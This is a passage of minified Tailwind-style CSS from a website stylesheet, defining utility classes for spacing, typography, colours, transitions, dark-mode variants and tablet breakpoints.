ight:4rem}.px-2{padding-left:.5rem;padding-right:.5rem}.px-4{padding-left:1rem;padding-right:1rem}.px-5{padding-left:1.25rem;padding-right:1.25rem}.px-6{padding-left:1.5rem;padding-right:1.5rem}.px-8{padding-left:2rem;padding-right:2rem}.px-\[calc\(\(100\%_-_1200px\)_\/_2\)\]{padding-left:calc(50% - 600px);padding-right:calc(50% - 600px)}.py-10{padding-bottom:2.5rem;padding-top:2.5rem}.py-2{padding-bottom:.5rem;padding-top:.5rem}.py-2\.5{padding-bottom:.625rem;padding-top:.625rem}.py-3{padding-bottom:.75rem;padding-top:.75rem}.py-3\.5{padding-bottom:.875rem;padding-top:.875rem}.py-5{padding-bottom:1.25rem;padding-top:1.25rem}.py-\[0\.625rem\]{padding-bottom:.625rem;padding-top:.625rem}.py-\[1\.125rem\]{padding-bottom:1.125rem;padding-top:1.125rem}.pb-12{padding-bottom:3rem}.pb-2{padding-bottom:.5rem}.pb-3{padding-bottom:.75rem}.pb-5{padding-bottom:1.25rem}.pb-8{padding-bottom:2rem}.pl-10{padding-left:2.5rem}.pl-4{padding-left:1rem}.pl-5{padding-left:1.25rem}.pr-5{padding-right:1.25rem}.pt-14{padding-top:3.5rem}.pt-2{padding-top:.5rem}.pt-24{padding-top:6rem}.pt-8{padding-top:2rem}.\!text-left{text-align:left!important}.text-left{text-align:left}.text-center{text-align:center}.font-inter{font-family:var(--font-inter)}.font-wixMadefor{font-family:var(--font-wix-madefor-display)}.\!text-\[13px\]{font-size:13px!important}.\!text-\[1rem\]{font-size:1rem!important}.text-\[12px\]{font-size:12px}.text-\[3rem\]{font-size:3rem}.text-mobileBodyExtraSmall{font-size:.75rem}.text-mobileBodyLarge{font-size:1.125rem}.text-mobileBodyMedium{font-size:1rem}.text-mobileBodySmall{font-size:.9375rem}.text-mobileButton{font-size:1rem}.text-mobileH1{font-size:2.375rem}.text-mobileH2{font-size:2rem}.text-mobileH3{font-size:1.625rem}.text-mobileH4{font-size:1.375rem}.text-mobileH5{font-size:1.1875rem}.font-\[500\]{font-weight:500}.font-\[600\]{font-weight:600}.font-\[700\],.font-bold{font-weight:700}.font-medium{font-weight:500}.font-semibold{font-weight:600}.italic{font-style:italic}.\!leading-\[100\%\]{line-height:100%!important}.leading-mobileBodyExtraSmall{line-height:.75rem}.leading-mobileBodyLarge{line-height:1.625rem}.leading-mobileBodyMedium,.leading-mobileBodySmall{line-height:1.125rem}.leading-mobileButton{line-height:.9375rem}.leading-mobileH1{line-height:2.8125rem}.leading-mobileH2{line-height:2.5rem}.leading-mobileH3{line-height:2rem}.leading-mobileH4{line-height:1.875rem}.leading-mobileH5{line-height:1.375rem}.tracking-tight{letter-spacing:-.025em}.\!text-\[\#00874E\]{--tw-text-opacity:1!important;color:rgb(0 135 78/var(--tw-text-opacity))!important}.\!text-trustBlack{--tw-text-opacity:1!important;color:rgb(27 27 28/var(--tw-text-opacity))!important}.\!text-trustBlue{--tw-text-opacity:1!important;color:rgb(5 0 255/var(--tw-text-opacity))!important}.\!text-trustWhite{--tw-text-opacity:1!important;color:rgb(255 255 255/var(--tw-text-opacity))!important}.text-lightBlack{--tw-text-opacity:1;color:rgb(36 36 38/var(--tw-text-opacity))}.text-trustBlack{--tw-text-opacity:1;color:rgb(27 27 28/var(--tw-text-opacity))}.text-trustBlue{--tw-text-opacity:1;color:rgb(5 0 255/var(--tw-text-opacity))}.text-trustLightBlue{--tw-text-opacity:1;color:rgb(46 204 255/var(--tw-text-opacity))}.text-trustWhite{--tw-text-opacity:1;color:rgb(255 255 255/var(--tw-text-opacity))}.underline{text-decoration-line:underline}.\!opacity-100{opacity:1!important}.opacity-0{opacity:0}.opacity-100{opacity:1}.opacity-50{opacity:.5}.opacity-75{opacity:.75}.opacity-80{opacity:.8}.mix-blend-hard-light{mix-blend-mode:hard-light}.outline-none{outline:2px solid transparent;outline-offset:2px}.outline{outline-style:solid}.blur{--tw-blur:blur(8px)}.blur,.filter{filter:var(--tw-blur) var(--tw-brightness) var(--tw-contrast) var(--tw-grayscale) var(--tw-hue-rotate) var(--tw-invert) var(--tw-saturate) var(--tw-sepia) var(--tw-drop-shadow)}.\!transition-\[unset\]{transition-duration:.15s!important;transition-property:unset!important;transition-timing-function:cubic-bezier(.4,0,.2,1)!important}.transition{transition-duration:.15s;transition-property:color,background-color,border-color,text-decoration-color,fill,stroke,opacity,box-shadow,transform,filter,-webkit-backdrop-filter;transition-property:color,background-color,border-color,text-decoration-color,fill,stroke,opacity,box-shadow,transform,filter,backdrop-filter;transition-property:color,background-color,border-color,text-decoration-color,fill,stroke,opacity,box-shadow,transform,filter,backdrop-filter,-webkit-backdrop-filter;transition-timing-function:cubic-bezier(.4,0,.2,1)}.transition-\[background-color\]{transition-duration:.15s;transition-property:background-color;transition-timing-function:cubic-bezier(.4,0,.2,1)}.transition-\[color\]{transition-duration:.15s;transition-property:color;transition-timing-function:cubic-bezier(.4,0,.2,1)}.transition-all{transition-duration:.15s;transition-property:all;transition-timing-function:cubic-bezier(.4,0,.2,1)}.delay-\[350ms\]{transition-delay:.35s}.\!duration-\[unset\]{transition-duration:unset!important}.duration-100{transition-duration:.1s}.duration-1000{transition-duration:1s}.duration-200{transition-duration:.2s}.duration-300{transition-duration:.3s}.duration-\[400ms\]{transition-duration:.4s}.ease-in{transition-timing-function:cubic-bezier(.4,0,1,1)}.ease-in-out{transition-timing-function:cubic-bezier(.4,0,.2,1)}.ease-out{transition-timing-function:cubic-bezier(0,0,.2,1)}.default-transition{transition-duration:.5s;transition-property:all;transition-timing-function:cubic-bezier(.4,0,.2,1)}.responsive-page-paddings{padding-left:1.25rem;padding-right:1.25rem}@media(min-width:768px){.responsive-page-paddings{padding-left:2.5rem;padding-right:2.5rem}}.full-screen-section{margin-left:-1.25rem;margin-right:-1.25rem;width:100vw}@media(min-width:768px){.full-screen-section{margin-left:-2.5rem;margin-right:-2.5rem}}.full-screen-section{padding-left:1.25rem;padding-right:1.25rem}@media(min-width:768px){.full-screen-section{padding-left:2.5rem;padding-right:2.5rem}}.full-screen-section-mobile{margin-left:-1.25rem;margin-right:-1.25rem;width:100vw}@media(min-width:768px){.full-screen-section-mobile{margin-left:-2.5rem;margin-right:-2.5rem}}.full-screen-section-mobile{padding-left:1.25rem;padding-right:1.25rem}@media(min-width:768px){.full-screen-section-mobile{padding-left:2.5rem;padding-right:2.5rem}}@media(min-width:992px){.full-screen-section-mobile{margin-left:0;margin-right:0;padding-left:0;padding-right:0;width:100%}}.\[filter\:blur\(20px\)\]{filter:blur(20px)}.\[transition-property\:background-color\2c border-color\]{transition-property:background-color,border-color}.\[transition-property\:background-color\2c color\]{transition-property:background-color,color}.\[transition-property\:background-color\]{transition-property:background-color}.\[transition-property\:border\2c background-color\]{transition-property:border,background-color}.\[transition-property\:border-color\2c background-color\]{transition-property:border-color,background-color}.\[transition-property\:border-color\]{transition-property:border-color}.\[transition-property\:border\]{transition-property:border}.\[transition-property\:color\2c _transform\]{transition-property:color,transform}.\[transition-property\:color\2c fill\]{transition-property:color,fill}.\[transition-property\:color\2c stroke\]{transition-property:color,stroke}.\[transition-property\:color\]{transition-property:color}.\[transition-property\:fill\2c color\]{transition-property:fill,color}.\[transition-property\:fill\2c stroke\]{transition-property:fill,stroke}.\[transition-property\:fill\]{transition-property:fill}.\[transition-property\:opacity\]{transition-property:opacity}.\[transition-property\:stop-color\2c color\]{transition-property:stop-color,color}.\[transition-property\:stroke\]{transition-property:stroke}html{scroll-behavior:smooth}body{position:relative}swiper-container{width:100%}swiper-slide{background-position:50%;background-size:cover;height:auto;overflow:hidden;width:100%!important}swiper-container::part(pagination){cursor:default;margin-bottom:-40px}swiper-container::part(bullet),swiper-container::part(bullet-active){background-color:#dbdce5;border-radius:0;cursor:pointer;height:3px;opacity:1;transition:all .5s ease-in-out;width:48px}swiper-container::part(bullet-active){background-color:#0500ff}.before\:absolute:before{content:var(--tw-content);position:absolute}.before\:bottom-0:before{bottom:0;content:var(--tw-content)}.before\:left-0:before{content:var(--tw-content);left:0}.before\:top-0:before{content:var(--tw-content);top:0}.before\:-z-\[1\]:before{content:var(--tw-content);z-index:-1}.before\:w-\[0\%\]:before{content:var(--tw-content);width:0}.before\:rounded-full:before{border-radius:9999px;content:var(--tw-content)}.before\:bg-trustGreen:before{--tw-bg-opacity:1;background-color:rgb(72 255 145/var(--tw-bg-opacity));content:var(--tw-content)}.before\:transition:before{content:var(--tw-content);transition-duration:.15s;transition-property:color,background-color,border-color,text-decoration-color,fill,stroke,opacity,box-shadow,transform,filter,-webkit-backdrop-filter;transition-property:color,background-color,border-color,text-decoration-color,fill,stroke,opacity,box-shadow,transform,filter,backdrop-filter;transition-property:color,background-color,border-color,text-decoration-color,fill,stroke,opacity,box-shadow,transform,filter,backdrop-filter,-webkit-backdrop-filter;transition-timing-function:cubic-bezier(.4,0,.2,1)}.before\:default-transition:before{content:var(--tw-content);transition-duration:.5s;transition-property:all;transition-timing-function:cubic-bezier(.4,0,.2,1)}.before\:\[transition-duration\:500ms\]:before{content:var(--tw-content);transition-duration:.5s}.before\:\[transition-property\:width\]:before{content:var(--tw-content);transition-property:width}.hover\:cursor-pointer:hover{cursor:pointer}.hover\:bg-tintBlue:hover{--tw-bg-opacity:1;background-color:rgb(219 220 229/var(--tw-bg-opacity))}.hover\:bg-trustBlack:hover{--tw-bg-opacity:1;background-color:rgb(27 27 28/var(--tw-bg-opacity))}.hover\:bg-trustBlue:hover{--tw-bg-opacity:1;background-color:rgb(5 0 255/var(--tw-bg-opacity))}.hover\:\!text-trustBlack:hover{--tw-text-opacity:1!important;color:rgb(27 27 28/var(--tw-text-opacity))!important}.hover\:\!text-white:hover{--tw-text-opacity:1!important;color:rgb(255 255 255/var(--tw-text-opacity))!important}.hover\:text-trustBlack:hover{--tw-text-opacity:1;color:rgb(27 27 28/var(--tw-text-opacity))}.hover\:text-trustWhite:hover{--tw-text-opacity:1;color:rgb(255 255 255/var(--tw-text-opacity))}.hover\:underline:hover{text-decoration-line:underline}.hover\:before\:w-full:hover:before{content:var(--tw-content);width:100%}.focus\:outline-none:focus{outline:2px solid transparent;outline-offset:2px}.data-\[isopen\=true\]\:visible[data-isopen=true],.data-\[selected\=true\]\:visible[data-selected=true]{visibility:visible}.data-\[isopen\=true\]\:invisible[data-isopen=true]{visibility:hidden}.data-\[selected\=true\]\:z-10[data-selected=true]{z-index:10}.data-\[odd\=true\]\:col-end-3[data-odd=true]{grid-column-end:3}.data-\[isopen\=true\]\:mb-0[data-isopen=true]{margin-bottom:0}.data-\[selectedmenu\=true\]\:mt-5[data-selectedmenu=true]{margin-top:1.25rem}.data-\[isopen\=true\]\:max-h-96[data-isopen=true]{max-height:24rem}.data-\[isopen\=true\]\:max-h-screen[data-isopen=true]{max-height:100vh}.data-\[selectedmenu\=true\]\:max-h-96[data-selectedmenu=true]{max-height:24rem}.data-\[checked\=true\]\:w-8[data-checked=true]{width:2rem}.data-\[checked\=true\]\:translate-y-\[-9px\][data-checked=true]{--tw-translate-y:-9px}.data-\[checked\=true\]\:translate-y-\[-9px\][data-checked=true],.data-\[checked\=true\]\:translate-y-\[9px\][data-checked=true]{transform:translate(var(--tw-translate-x),var(--tw-translate-y)) rotate(var(--tw-rotate)) skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))}.data-\[checked\=true\]\:translate-y-\[9px\][data-checked=true]{--tw-translate-y:9px}.data-\[checked\=true\]\:rotate-45[data-checked=true]{--tw-rotate:45deg}.data-\[checked\=true\]\:rotate-45[data-checked=true],.data-\[checked\=true\]\:rotate-90[data-checked=true]{transform:translate(var(--tw-translate-x),var(--tw-translate-y)) rotate(var(--tw-rotate)) skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))}.data-\[checked\=true\]\:rotate-90[data-checked=true]{--tw-rotate:90deg}.data-\[checked\=true\]\:rotate-\[-45deg\][data-checked=true]{--tw-rotate:-45deg}.data-\[checked\=true\]\:rotate-\[-45deg\][data-checked=true],.data-\[open\=true\]\:rotate-90[data-open=true],.data-\[selectedmenu\=true\]\:rotate-90[data-selectedmenu=true]{transform:translate(var(--tw-translate-x),var(--tw-translate-y)) rotate(var(--tw-rotate)) skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))}.data-\[open\=true\]\:rotate-90[data-open=true],.data-\[selectedmenu\=true\]\:rotate-90[data-selectedmenu=true]{--tw-rotate:90deg}.data-\[odd\=false\]\:flex-row-reverse[data-odd=false]{flex-direction:row-reverse}.data-\[firstcolumn\=false\]\:border-l[data-firstcolumn=false]{border-left-width:1px}.data-\[hasnext\=false\]\:\!border-b-0[data-hasnext=false]{border-bottom-width:0!important}.data-\[lastrow\=false\]\:border-b[data-lastrow=false]{border-bottom-width:1px}.data-\[active\=true\]\:border-trustBlack[data-active=true]{--tw-border-opacity:1;border-color:rgb(27 27 28/var(--tw-border-opacity))}.data-\[current\=true\]\:\!border-trustBlue[data-current=true]{--tw-border-opacity:1!important;border-color:rgb(5 0 255/var(--tw-border-opacity))!important}.data-\[isopen\=true\]\:bg-baseWhite[data-isopen=true]{--tw-bg-opacity:1;background-color:rgb(244 244 247/var(--tw-bg-opacity))}.data-\[selected\=true\]\:bg-trustBlue[data-selected=true]{--tw-bg-opacity:1;background-color:rgb(5 0 255/var(--tw-bg-opacity))}.data-\[isopen\=false\]\:\!py-0[data-isopen=false]{padding-bottom:0!important;padding-top:0!important}.data-\[first\=true\]\:pt-0[data-first=true]{padding-top:0}.data-\[sequential\=true\]\:\!pb-20[data-sequential=true]{padding-bottom:5rem!important}.data-\[sequential\=true\]\:\!pt-32[data-sequential=true]{padding-top:8rem!important}.data-\[selected\=true\]\:text-trustWhite[data-selected=true]{--tw-text-opacity:1;color:rgb(255 255 255/var(--tw-text-opacity))}.data-\[checked\=true\]\:opacity-0[data-checked=true],.data-\[isopen\=true\]\:opacity-0[data-isopen=true]{opacity:0}.data-\[isopen\=true\]\:opacity-100[data-isopen=true]{opacity:1}.data-\[isopen\=true\]\:opacity-50[data-isopen=true]{opacity:.5}.data-\[onview\=false\]\:opacity-75[data-onview=false]{opacity:.75}.data-\[selected\=true\]\:opacity-100[data-selected=true]{opacity:1}.data-\[isopen\=false\]\:delay-150[data-isopen=false]{transition-delay:.15s}.data-\[isopen\=true\]\:delay-300[data-isopen=true]{transition-delay:.3s}.data-\[blue\=true\]\:before\:absolute[data-blue=true]:before,.data-\[onview\=true\]\:before\:absolute[data-onview=true]:before{content:var(--tw-content);position:absolute}.data-\[blue\=true\]\:before\:inset-0[data-blue=true]:before{content:var(--tw-content);inset:0}.data-\[onview\=true\]\:before\:-left-\[30px\][data-onview=true]:before{content:var(--tw-content);left:-30px}.data-\[onview\=true\]\:before\:-top-0[data-onview=true]:before{content:var(--tw-content);top:0}.data-\[blue\=true\]\:before\:z-10[data-blue=true]:before{content:var(--tw-content);z-index:10}.data-\[onview\=true\]\:before\:h-full[data-onview=true]:before{content:var(--tw-content);height:100%}.data-\[onview\=true\]\:before\:w-\[3px\][data-onview=true]:before{content:var(--tw-content);width:3px}.data-\[blue\=true\]\:before\:bg-trustBlue[data-blue=true]:before,.data-\[onview\=true\]\:before\:bg-trustBlue[data-onview=true]:before{--tw-bg-opacity:1;background-color:rgb(5 0 255/var(--tw-bg-opacity));content:var(--tw-content)}.data-\[blue\=true\]\:before\:opacity-80[data-blue=true]:before{content:var(--tw-content);opacity:.8}.data-\[blue\=true\]\:before\:mix-blend-screen[data-blue=true]:before{content:var(--tw-content);mix-blend-mode:screen}:is(.dark .dark\:visible){visibility:visible}:is(.dark .dark\:invisible){visibility:hidden}:is(.dark .dark\:block){display:block}:is(.dark .dark\:hidden){display:none}:is(.dark .dark\:\!border-tintBlack){--tw-border-opacity:1!important;border-color:rgb(75 75 75/var(--tw-border-opacity))!important}:is(.dark .dark\:border-\[transparent_transparent_\#1B1B1C_transparent\]){border-color:transparent transparent #1b1b1c}:is(.dark .dark\:border-\[transparent_transparent_\#48FF91_transparent\]){border-color:transparent transparent #48ff91}:is(.dark .dark\:border-tintBlack){--tw-border-opacity:1;border-color:rgb(75 75 75/var(--tw-border-opacity))}:is(.dark .dark\:border-tintBlue){--tw-border-opacity:1;border-color:rgb(219 220 229/var(--tw-border-opacity))}:is(.dark .dark\:border-trustGreen){--tw-border-opacity:1;border-color:rgb(72 255 145/var(--tw-border-opacity))}:is(.dark .dark\:border-trustWhite){--tw-border-opacity:1;border-color:rgb(255 255 255/var(--tw-border-opacity))}:is(.dark .dark\:\!bg-trustBlack){--tw-bg-opacity:1!important;background-color:rgb(27 27 28/var(--tw-bg-opacity))!important}:is(.dark .dark\:\!bg-trustGreen){--tw-bg-opacity:1!important;background-color:rgb(72 255 145/var(--tw-bg-opacity))!important}:is(.dark .dark\:bg-lightBlack){--tw-bg-opacity:1;background-color:rgb(36 36 38/var(--tw-bg-opacity))}:is(.dark .dark\:bg-tintBlue){--tw-bg-opacity:1;background-color:rgb(219 220 229/var(--tw-bg-opacity))}:is(.dark .dark\:bg-trustBlack){--tw-bg-opacity:1;background-color:rgb(27 27 28/var(--tw-bg-opacity))}:is(.dark .dark\:bg-trustBlue){--tw-bg-opacity:1;background-color:rgb(5 0 255/var(--tw-bg-opacity))}:is(.dark .dark\:bg-trustGreen){--tw-bg-opacity:1;background-color:rgb(72 255 145/var(--tw-bg-opacity))}:is(.dark .dark\:bg-trustWhite){--tw-bg-opacity:1;background-color:rgb(255 255 255/var(--tw-bg-opacity))}:is(.dark .dark\:bg-\[linear-gradient\(299deg\2c _rgba\(219\2c 220\2c 229\2c 0\.20\)-2\.14\%\2c _rgba\(219\2c 220\2c 229\2c 0\.00\)97\.1\%\)\]){background-image:linear-gradient(299deg,rgba(219,220,229,.2) -2.14%,rgba(219,220,229,0) 97.1%)}:is(.dark .dark\:bg-\[linear-gradient\(324deg\2c rgba\(219\2c 220\2c 229\2c 0\.20\)0\%\2c rgba\(219\2c 220\2c 229\2c 0\.00\)100\%\)\]){background-image:linear-gradient(324deg,rgba(219,220,229,.2),rgba(219,220,229,0))}:is(.dark .dark\:fill-trustBlack){fill:#1b1b1c}:is(.dark .dark\:fill-trustWhite){fill:#fff}:is(.dark .dark\:stroke-tintBlack){stroke:#4b4b4b}:is(.dark .dark\:\!text-baseWhite){--tw-text-opacity:1!important;color:rgb(244 244 247/var(--tw-text-opacity))!important}:is(.dark .dark\:\!text-trustBlack){--tw-text-opacity:1!important;color:rgb(27 27 28/var(--tw-text-opacity))!important}:is(.dark .dark\:\!text-trustGreen){--tw-text-opacity:1!important;color:rgb(72 255 145/var(--tw-text-opacity))!important}:is(.dark .dark\:\!text-trustWhite){--tw-text-opacity:1!important;color:rgb(255 255 255/var(--tw-text-opacity))!important}:is(.dark .dark\:text-trustBlack){--tw-text-opacity:1;color:rgb(27 27 28/var(--tw-text-opacity))}:is(.dark .dark\:text-trustGreen){--tw-text-opacity:1;color:rgb(72 255 145/var(--tw-text-opacity))}:is(.dark .dark\:text-trustWhite){--tw-text-opacity:1;color:rgb(255 255 255/var(--tw-text-opacity))}:is(.dark .dark\:text-trustYellow){--tw-text-opacity:1;color:rgb(255 244 101/var(--tw-text-opacity))}:is(.dark .dark\:opacity-0){opacity:0}:is(.dark .dark\:opacity-100){opacity:1}:is(.dark .before\:dark\:bg-trustBlue):before{--tw-bg-opacity:1;background-color:rgb(5 0 255/var(--tw-bg-opacity));content:var(--tw-content)}:is(.dark .before\:dark\:bg-trustWhite):before{--tw-bg-opacity:1;background-color:rgb(255 255 255/var(--tw-bg-opacity));content:var(--tw-content)}:is(.dark .dark\:before\:bg-trustWhite):before{--tw-bg-opacity:1;background-color:rgb(255 255 255/var(--tw-bg-opacity));content:var(--tw-content)}:is(.dark .dark\:hover\:bg-tintBlack:hover){--tw-bg-opacity:1;background-color:rgb(75 75 75/var(--tw-bg-opacity))}:is(.dark .dark\:hover\:bg-trustGreen:hover){--tw-bg-opacity:1;background-color:rgb(72 255 145/var(--tw-bg-opacity))}:is(.dark .dark\:hover\:bg-trustWhite:hover){--tw-bg-opacity:1;background-color:rgb(255 255 255/var(--tw-bg-opacity))}:is(.dark .dark\:hover\:\!text-trustBlack:hover){--tw-text-opacity:1!important;color:rgb(27 27 28/var(--tw-text-opacity))!important}:is(.dark .dark\:hover\:text-trustBlack:hover){--tw-text-opacity:1;color:rgb(27 27 28/var(--tw-text-opacity))}:is(.dark .dark\:hover\:text-trustWhite:hover){--tw-text-opacity:1;color:rgb(255 255 255/var(--tw-text-opacity))}:is(.dark .dark\:data-\[active\=true\]\:border-trustWhite[data-active=true]){--tw-border-opacity:1;border-color:rgb(255 255 255/var(--tw-border-opacity))}:is(.dark .dark\:data-\[current\=true\]\:\!border-trustGreen[data-current=true]){--tw-border-opacity:1!important;border-color:rgb(72 255 145/var(--tw-border-opacity))!important}:is(.dark .dark\:data-\[selected\=true\]\:bg-trustGreen[data-selected=true]){--tw-bg-opacity:1;background-color:rgb(72 255 145/var(--tw-bg-opacity))}:is(.dark .dark\:data-\[selected\=true\]\:text-trustBlack[data-selected=true]){--tw-text-opacity:1;color:rgb(27 27 28/var(--tw-text-opacity))}:is(.dark .dark\:data-\[onview\=true\]\:before\:bg-trustGreen[data-onview=true]):before{--tw-bg-opacity:1;background-color:rgb(72 255 145/var(--tw-bg-opacity));content:var(--tw-content)}@media(min-width:768px){.tablet\:static{position:static}.tablet\:absolute{position:absolute}.tablet\:sticky{position:sticky}.tablet\:-right-\[70\%\]{right:-70%}.tablet\:-top-12{top:-3rem}.tablet\:-top-\[90\%\]{top:-90%}.tablet\:bottom-\[unset\]{bottom:unset}.tablet\:right-8{right:2rem}.tablet\:col-span-2{grid-column:span 2/span 2}.tablet\:col-start-1{grid-column-start:1}.tablet\:col-start-2{grid-column-start:2}.tablet\:col-end-2{grid-column-end:2}.tablet\:col-end-3{grid-column-end:3}.tablet\:row-start-1{grid-row-start:1}.tablet\:row-start-2{grid-row-start:2}.tablet\:row-start-3{grid-row-start:3}.tablet\:row-start-4{grid-row-start:4}.tablet\:row-end-4{grid-row-end:4}.tablet\:mx-0{margin-left:0;margin-right:0}.tablet\:mx-\[unset\]{margin-left:unset;margin-right:unset}.tablet\:my-10{margin-bottom:2.5rem;margin-top:2.5rem}.tablet\:my-4{margin-bottom:1rem;margin-top:1rem}.tablet\:my-6{margin-bottom:1.5rem;margin-top:1.5rem}.tablet\:my-8{margin-bottom:2rem;margin-top:2rem}.tablet\:-mr-0{margin-right:0}.tablet\:-mt-40{margin-top:-10rem}.tablet\:-mt-5{margin-top:-1.25rem}.tablet\:-mt-\[35\%\]{margin-top:-35%}.tablet\:mb-20{margin-bottom:5rem}.tablet\:mb-4{margin-bottom:1rem}.tablet\:mb-5{margin-bottom:1.25rem}.tablet\:mb-6{margin-bottom:1.5rem}.tablet\:mb-64{margin-bottom:16rem}.tablet\:ml-10{margin-left:2.5rem}.tablet\:mt-0{margin-top:0}.tablet\:mt-10{margin-top:2.5rem}.tablet\:mt-12{margin-top:3rem}.tablet\:mt-20{margin-top:5rem}.tablet\:mt-5{margin-top:1.25rem}.tablet\:mt-6{margin-top:1.5rem}.tablet\:mt-8{margin-top:2rem}.tablet\:mt-9{margin-top:2.25rem}.tablet\:block{display:block}.tablet\:inline-block{display:inline-block}.tablet\:flex{display:flex}.tablet\:grid{display:grid}.tablet\:hidden{display:none}.tablet\:h-\[100px\]{height:100px}.tablet\:h-\[115px\]{height:115px}.tablet\:h-\[140px\]{height:140px}.tablet\:h-\[190px\]{height:190px}.tablet\:h-\[200px\]{height:200px}.tablet\:h-\[232px\]{height:232px}.tablet\:h-\[235px\]{height:235px}.tablet\:h-\[250px\]{height:250px}.tablet\:h-\[280px\]{height:280px}.tablet\:h-\[300px\]{height:300px}.tablet\:h-\[350px\]{height:350px}.tablet\:h-\[380px\]{height:380px}.tablet\:h-\[506px\]{height:506px}.tablet\:h-\[52px\]{height:52px}.tablet\:h-\[800px\]{height:800px}.tablet\:h-\[94px\]{height:94px}.tablet\:h-auto{height:auto}.tablet\:max-h-\[400px\]{max-height:400px}.tablet\:min-h-\[14px\]{min-height:14px}.tablet\:min-h-\[300px\]{min-height:300px}.tablet\:min-h-\[305px\]{min-height:305px}.tablet\:min-h-\[398px\]{min-height:398px}.tablet\:min-h-\[450px\]{min-height:450px}.tablet\:w-\[115px\]{width:115px}.tablet\:w-\[165px\]{width:165px}.tablet\:w-\[180px\]{width:180px}.tablet\:w-\[220px\]{width:220px}.tablet\:w-\[28px\]{width:28px}.tablet\:w-\[30px\]{width:30px}.tablet\:w-\[50\%\]{width:50%}.tablet\:w-\[72px\]{width:72px}.tablet\:w-auto{width:auto}.tablet\:w-fit{width:-moz-fit-content;width:fit-content}.tablet\:w-full{width:100%}.tablet\:min-w-\[280px\]{min-width:280px}.tablet\:min-w-\[30px\]{min-width:30px}.tablet\:min-w-\[340px\]{min-width:340px}.tablet\:min-w-\[350px\]{min-width:350px}.tablet\:min-w-\[375px\]{min-width:375px}.tablet\:min-w-\[600px\]{min-width:600px}.tablet\:max-w-\[16ch\]{max-width:16ch}.tablet\:max-w-\[170px\]{max-width:170px}.tablet\:max-w-\[21ch\]{max-width:21ch}.tablet\:max-w-\[300px\]{max-width:300px}.tablet\:max-w-\[315px\]{max-width:315px}.tablet\:max-w-\[330px\]{max-width:330px}.tablet\:max-w-\[350px\]{max-width:350px}.tablet\:max-w-\[35ch\]{max-width:35ch}.tablet\:max-w-\[375px\]{max-width:375px}.tablet\:max-w-\[380px\]{max-width:380px}.tablet\:max-w-\[400px\]{max-width:400px}.tablet\:max-w-\[40ch\]{max-width:40ch}.tablet\:max-w-\[420px\]{max-width:420px}.tablet\:max-w-\[450px\]{max-width:450px}.tablet\:max-w-\[510px\]{max-width:510px}.tablet\:max-w-\[710px\]{max-width:710px}.tablet\:max-w-\[unset\]{max-width:unset}.tablet\:max-w-none{max-width:none}.tablet\:flex-1{flex:1 1 0%}.tablet\:grid-cols-2{grid-template-columns:repeat(2,minmax(0,1fr))}.tablet\:grid-cols-\[1fr\2c 2\.5fr\]{grid-template-columns:1fr 2.5fr}.tablet\:grid-cols-\[1fr\2c 300px\]{grid-template-columns:1fr 300px}.tablet\:grid-rows-1{grid-template-rows:repeat(1,minmax(0,1fr))}.tablet\:flex-row{flex-direction:row}.tablet\:flex-row-reverse{flex-direction:row-reverse}.tablet\:flex-wrap{flex-wrap:wrap}.tablet\:place-content-center{place-content:center}.tablet\:items-center{align-items:center}.tablet\:items-stretch{align-items:stretch}.tablet\:justify-start{justify-content:flex-start}.tablet\:justify-center{justify-content:center}.tablet\:justify-between{justify-content:space-between}.tablet\:gap-0{gap:0}.tablet\:gap-2{gap:.5rem}.tablet\:gap-5{gap:1.25rem}.tablet\:gap-6{gap:1.5rem}.tablet\:gap-7{gap:1.75rem}.tablet\:gap-8{gap:2rem}.tablet\:gap-9{gap:2.25rem}.tablet\:gap-x-10{-moz-column-gap:2.5rem;column-gap:2.5rem}.tablet\:gap-x-7{-moz-column-gap:1.75rem;column-gap:1.75rem}.tablet\:gap-x-8{-moz-column-gap:2rem;column-gap:2rem}.tablet\:gap-y-14{row-gap:3.5rem}.tablet\:gap-y-16{row-gap:4rem}.tablet\:gap-y-20{row-gap:5rem}.tablet\:gap-y-7{row-gap:1.75rem}.tablet\:justify-self-end{justify-self:end}.tablet\:overflow-visible{overflow:visible}.tablet\:\!rounded-\[20px\]{border-radius:20px!important}.tablet\:rounded-\[18px\]{border-radius:18px}.tablet\:rounded-\[20px\]{border-radius:20px}.tablet\:rounded-\[30px\]{border-radius:30px}.tablet\:border-0{border-width:0}.tablet\:\!border-solid{border-style:solid!important}.tablet\:\!border-tintBlue{--tw-border-opacity:1!important;border-color:rgb(219 220 229/var(--tw-border-opacity))!important}.tablet\:\!bg-baseWhite{--tw-bg-opacity:1!important;background-color:rgb(244 244 247/var(--tw-bg-opacity))!important}.tablet\:\!bg-transparent{background-color:transparent!important}.tablet\:\!p-10{padding:2.5rem!important}.tablet\:\!p-5{padding:1.25rem!important}.tablet\:p-10{padding:2.5rem}.tablet\:\!px-10{padding-left:2.5rem!important;padding-right:2.5rem!important}.tablet\:\!py-0{padding-bottom:0!important;padding-top:0!important}.tablet\:\!py-10{padding-bottom:2.5rem!important;padding-top:2.5rem!important}.tablet\:\!py-14{padding-bottom:3.5rem!important;padding-top:3.5rem!important}.tablet\:\!py-20{padding-bottom:5rem!important;padding-top:5rem!important}.tablet\:px-10{padding-left:2.5rem;padding-right:2.5rem}.tablet\:px-3{padding-left:.75rem;padding-right:.75rem}.tablet\:px-3\.5{padding-left:.875rem;padding-right:.875rem}.tablet\:py-12{padding-bottom:3rem;padding-top:3rem}.tablet\:py-3{padding-bottom:.75rem;padding-top:.75rem}.tablet\:text-left{text-align:left}.tablet\:text-desktopBodyExtraSmall{font-size:.875rem}.tablet\:text-desktopBodyLarge{font-size:1.125rem}.tablet\:text-desktopBodyMedium{font-size:.9375rem}.tablet\:text-desktopBodySmall{font-size:.75rem}.tablet\:text-desktopButton{font-size:.9375rem}.tablet\:text-desktopH1{font-size:3.25rem}.tablet\:text-desktopH2{font-size:2.375rem}.tablet\:text-desktopH3{font-size:1.875rem}.tablet\:text-desktopH4{font-size:1.5625rem}.tablet\:text-desktopH5{font-size:1.125rem}.tablet\:leading-desktopBodyExtraSmall{line-height:.875rem}.tablet\:leading-desktopBodyLarge{line-height:1.625rem}.tablet\:leading-desktopBodyMedium{line-height:1.375rem}.tablet\:leading-desktopBodySmall{line-height:1